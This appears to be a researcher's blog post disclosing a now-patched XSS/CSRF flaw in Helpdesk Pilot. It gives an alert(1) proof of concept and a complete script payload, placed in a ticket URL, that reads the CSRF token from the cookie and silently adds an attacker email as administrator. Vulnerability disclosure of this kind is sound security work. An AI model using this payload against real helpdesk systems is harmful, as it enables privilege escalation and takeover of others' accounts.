maKthePla.net


Helpdesk Pilot Xss/CSRF Add an Admin

This bug allows a malicious party add themselves as a helpdesk Administrator via a crafted Xss/CSRF combination. It effects all versions of the Helpdesk Pilot software. I have received confirmation that this bug has been patched in the latest version of this software from the developers.There is a video demonstration of this attack below.

The attacker submits a ticket containing a malicious Url which results in javascript execution. If our administrator views this ticket, via cross site request forgery, he/she adds our attacker as an admin. It is also possible to craft this attack should a regular Staff account open our ticket.

The bug is a result of incorrect escaping on a Url. For a simple proof of concept you can use the following http://makthepla.net/<script>alert(1);</script> This will demonstrate that javascript execution is possible through submitting a ticket.

For a more malicious demonstration as shown in the video, an admin could be added using a Url of the following.

http://makthepla.net/Add_admin_poc/<script>$(document).ready(function(){$.ajax({type: /"POST",url:"http://poc.helpdeskpilot.net/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=ATTACKER@MAIL.COM&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});</script>

This submits a form that would add an administrator assuming the person viewing the ticket has administrator permissions.